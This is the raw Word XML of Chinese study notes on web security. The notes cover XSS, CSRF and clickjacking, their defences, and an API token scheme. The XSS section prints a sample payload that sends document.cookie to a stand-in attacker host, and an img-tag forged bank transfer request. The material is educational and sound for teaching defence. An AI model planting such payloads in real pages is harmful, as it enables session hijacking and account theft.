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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见web安全及防护原理</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/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XSS原理及防范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</w:rPr>
        <w:t>XSS 全称“跨站脚本”，是注入攻击的一种。其特点是不对服务器端造成任何伤害，而是通过一些正常的站内交互途径，例如发布评论，提交含有 JavaScript 的内容文本。这时服务器端如果没有过滤或转义掉这些脚本，作为内容发布到了页面上，其他用户访问这个页面的时候就会运行这些脚本。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</w:rPr>
      </w:pP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相比于csrf,xss囊括的内容很多,而且往往是多种形式组合而成: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Cookie劫持、会话伪造、恶意代码等等....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①cookie劫持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页面中有一个评论输入，输入后会，因为后台的漏洞，没有过滤特殊字符，会直接明文保存到数据库中，然后展示到网页时直接展示明文数据，那么如下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&lt;%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%&gt;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 xml:space="preserve">&lt;form action="saveComment.jsp" method="post"&gt; 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 xml:space="preserve">     请输入评论内容：&lt;BR&gt; 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 xml:space="preserve">     &lt;input name="content" type="text"&gt; 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 xml:space="preserve">     &lt;input type="submit" value="确认"&gt;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 xml:space="preserve">&lt;/form&gt; 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然后攻击者分析后，输入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&lt;script&gt;window.open("http://www.attackpage.com/record?secret=" + document.cookie)&lt;/script&gt;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很简单的代码，由于没有过滤脚本，那么其它用户登陆后，在看到这篇文章时就会自动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>将他们的cookie信息都发送到了攻击者的服务器。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攻击者可以在cookie（譬如jsessionid对应的session）有效期内拿它们冒充用户操作。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②会话伪造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同样是评论漏洞的示例,攻击者输入（举例比喻）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&lt;img src=http://www.bank.example/transfer?toBankId=hello&amp;amount=1000000 width='0' height='0'&gt;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然后，接下来发生的故事就和CSRF中提到的一致。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>这种情况就是基于XSS而开展的CSRF，也有人喜欢称之为XSRF,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需要注意，这里并没有自己拿到cookie，而是CSRF中提到的利用浏览器的隐式验证机制来冒充用户。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③其它恶意代码执行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譬如前面的评论中的输入可以是：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市面上盛行的网页游戏弹窗等。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干脆直接让这个页面卡死都可以。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left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无限循环。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XSS(跨站脚本攻击)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防御手段：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两端进行输入格式检查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对”&lt;”,”&gt;”,”;”,”’”等字符做过滤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通过编码转义的方式进行输出检查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任何内容写到页面之前都必须加以encode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白名单整理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,对于用户输入的html,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所有的标签、属性都只从白名单中拿取。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如果网站不需要再浏览器端对cookie 进行操作，可以在Set-Cookie 末尾加上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 xml:space="preserve">HttpOnly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来防止javascript 代码直接获取cookie。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CSRF：跨站请求伪造，缩写为：CSRF/XSRF。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</w:rPr>
        <w:t>你这可以这么理解CSRF攻击：攻击者盗用了你的身份，以你的名义发送恶意请求。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原理图：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0" distR="0">
            <wp:extent cx="5104130" cy="2875915"/>
            <wp:effectExtent l="0" t="0" r="1270" b="4445"/>
            <wp:docPr id="1" name="图片 1" descr="https://pic002.cnblogs.com/img/hyddd/200904/2009040916453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pic002.cnblogs.com/img/hyddd/200904/200904091645317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081" cy="287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要完成一次CSRF攻击，受害者必须依次完成两个步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b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color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1.登录受信任网站A，并在本地生成Cookie。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color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.在不登出A的情况下，访问危险网站B。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注意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Csrf根本不知道cookie是什么,而仅仅是利用浏览器的隐式校验方式冒充用户</w:t>
      </w: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CSRF(攻击跨站请求伪造) 防御手段：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①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token验证机制，比如请求数据字段中添加一个token，响应请求时校验其有效性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优点：比检查Referer方法更安全，并且不涉及用户隐私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缺点：对所有的请求都添加Token比较困难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②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用户操作限制，比如验证码（繁琐，用户体验差）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③Referer首部包含了当前请求页面的来源页面的地址,利用HTTP头中的Referer判断请求来源是否合法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优点：简单易操作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缺点：服务器并非什么时候都能取到Referer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很多出于保护用户隐私的考虑，限制了Referer的发送。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比如从HTTPS跳转到HTTP，出于安全的考虑，浏览器不会发送Referer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点击劫持（ClickJacking）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点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的、不可见的iframe，覆盖在一个网页上，然后诱使用户在网页上进行操作，此时用户将在不知情的情况下点击透明的iframe页面。通过调整iframe页面的位置，可以诱使用户恰好点击在iframe页面的一些功能性按钮上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防御点击劫持：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X-Frame-Options HTTP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响应头是用来给浏览器指示允许一个页面能否在&lt;frame&gt;、&lt;iframe&gt;、&lt;object&gt;中展现的标记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有三个可选的值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DENY：浏览器会拒绝当前页面加载任何frame页面（即使是相同域名的页面也不允许）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SAMEORIGIN：允许加载frame页面，但是frame页面的地址只能为同源域名下的页面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ALLOW-FROM：可以加载指定来源的frame页面（可以定义frame页面的地址）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  <w:t>移动端与服务端的通信就需要2把钥匙，即2个token。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t>第一个token是针对接口的（api_token）；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t>第二个token是针对用户的（user_token）；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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>针对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  <w:t>接口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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的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  <w:t>token</w:t>
      </w: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  <w:t>生成规则参考如下：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t>api_token = md5 ('模块名' + '控制器名' + '方法名' + '2017-07-18' + '加密密钥') = 770fed4ca2aabd20ae9a5dd774711de2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其中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t xml:space="preserve"> '2013-12-18' 为当天时间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t>'加密密钥' 为私有的加密密钥，手机端需要在服务端注册一个“接口使用者”账号后，系统会分配一个账号及密码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具体交互的过程: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①客户端生成自己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t>api_token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,发送: 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请求数据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client_id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 和 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</w:rPr>
        <w:t>api_token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到服务器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②服务器里面存储了各个用户的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client_id及对应的密钥,它根据客户端传过来的client_id，查询数据库，获取对应的client_secret(密钥)。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③服务器重新生成一份api_token_server,用上面同样的方式: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$api_token_server = md5($module.$controller.$action.date('Y-m-d', time()).$client_secret);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④服务器将客户端传过来的api_token与自己生成的api_token_server进行校对，如果不相等，则表示验证失败。如果相等,则通过验证,将数据返回到客户端。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针对用户的token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如果接口需要用户登录，其访问流程如下：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1、用户提交“用户名”和“密码”，实现登录（条件允许，这一步最好走https）；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2、登录成功后，服务端返回一个 user_token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服务端生成user_token 后，返回给客户端（自己存储），客户端每次接口请求时，如果接口需要用户登录才能访问，则需要把 user_id 与 user_token, api_token 传回给服务端，服务端接受到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这2个参数后，需要做以下几步：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1、检测 api_token的有效性；(第一步还是检验接口token)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2、删除过期的 user_token 表记录；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3、根据 user_id，user_token 获取表记录，如果表记录不存在，直接返回错误，如果记录存在，则进行下一步；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4、更新 user_token 的过期时间（延期，保证其有效期内连续操作不掉线）；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5、返回接口数据。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那么token如何传递呢，ajax中传递token有以下几种方式：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1、放在请求头中：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headers: {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  Accept: “application/json;charset=utf-8”,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  userToken: “” + userToken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2、使用beforeSend方法设置请求头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beforeSend: function(request) {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  request.setRequestHeader(“Authorization”,token);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763A2"/>
    <w:rsid w:val="042A7054"/>
    <w:rsid w:val="049C4D9E"/>
    <w:rsid w:val="0521780A"/>
    <w:rsid w:val="0A670DC8"/>
    <w:rsid w:val="0A761F85"/>
    <w:rsid w:val="0C1503A3"/>
    <w:rsid w:val="0CE106EA"/>
    <w:rsid w:val="0CE20B8C"/>
    <w:rsid w:val="117C038E"/>
    <w:rsid w:val="11BB7A56"/>
    <w:rsid w:val="12F763A2"/>
    <w:rsid w:val="174F318E"/>
    <w:rsid w:val="1A5644A4"/>
    <w:rsid w:val="1B1274E6"/>
    <w:rsid w:val="1C7016FA"/>
    <w:rsid w:val="1D1A0A5B"/>
    <w:rsid w:val="1F0E3069"/>
    <w:rsid w:val="28056B13"/>
    <w:rsid w:val="2BB23F0F"/>
    <w:rsid w:val="2D906EF7"/>
    <w:rsid w:val="31441100"/>
    <w:rsid w:val="321F2EE2"/>
    <w:rsid w:val="322E18A1"/>
    <w:rsid w:val="323761DE"/>
    <w:rsid w:val="36430326"/>
    <w:rsid w:val="367808DF"/>
    <w:rsid w:val="37D775F0"/>
    <w:rsid w:val="3A5C50EE"/>
    <w:rsid w:val="3A7D3EA5"/>
    <w:rsid w:val="3C406B51"/>
    <w:rsid w:val="3D3455A6"/>
    <w:rsid w:val="458B3B41"/>
    <w:rsid w:val="45EF2F1B"/>
    <w:rsid w:val="466F09D8"/>
    <w:rsid w:val="46C92047"/>
    <w:rsid w:val="4721047C"/>
    <w:rsid w:val="47D23BBE"/>
    <w:rsid w:val="496D1D10"/>
    <w:rsid w:val="4A471890"/>
    <w:rsid w:val="4B75313B"/>
    <w:rsid w:val="4DC84F1B"/>
    <w:rsid w:val="50844BD8"/>
    <w:rsid w:val="5388305E"/>
    <w:rsid w:val="54876AD0"/>
    <w:rsid w:val="58412802"/>
    <w:rsid w:val="5A20030B"/>
    <w:rsid w:val="5A523CB8"/>
    <w:rsid w:val="5B9D1AE9"/>
    <w:rsid w:val="5ED57CC3"/>
    <w:rsid w:val="5FC95D09"/>
    <w:rsid w:val="68370C82"/>
    <w:rsid w:val="6A325D40"/>
    <w:rsid w:val="6B8D513E"/>
    <w:rsid w:val="6BA52743"/>
    <w:rsid w:val="732C1569"/>
    <w:rsid w:val="74C675E4"/>
    <w:rsid w:val="78765981"/>
    <w:rsid w:val="78862E60"/>
    <w:rsid w:val="7A6B7660"/>
    <w:rsid w:val="7F8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2019-08-02T05:22:00Z</dcterms:created>
  <dc:creator>陈泽豪</dc:creator>
  <cp:lastModifiedBy>陈泽豪</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-06T07:01:32Z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